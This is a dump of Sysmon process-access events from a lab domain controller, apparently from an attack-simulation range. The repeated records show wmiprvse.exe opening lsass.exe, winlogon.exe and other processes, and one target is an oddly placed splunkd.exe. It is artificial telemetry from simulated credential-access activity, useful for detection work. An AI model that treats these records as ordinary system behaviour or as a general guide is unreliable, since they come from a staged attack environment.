15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024192Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024191Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:23.335{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024530Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024529Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024528Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024527Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.991{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024526Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 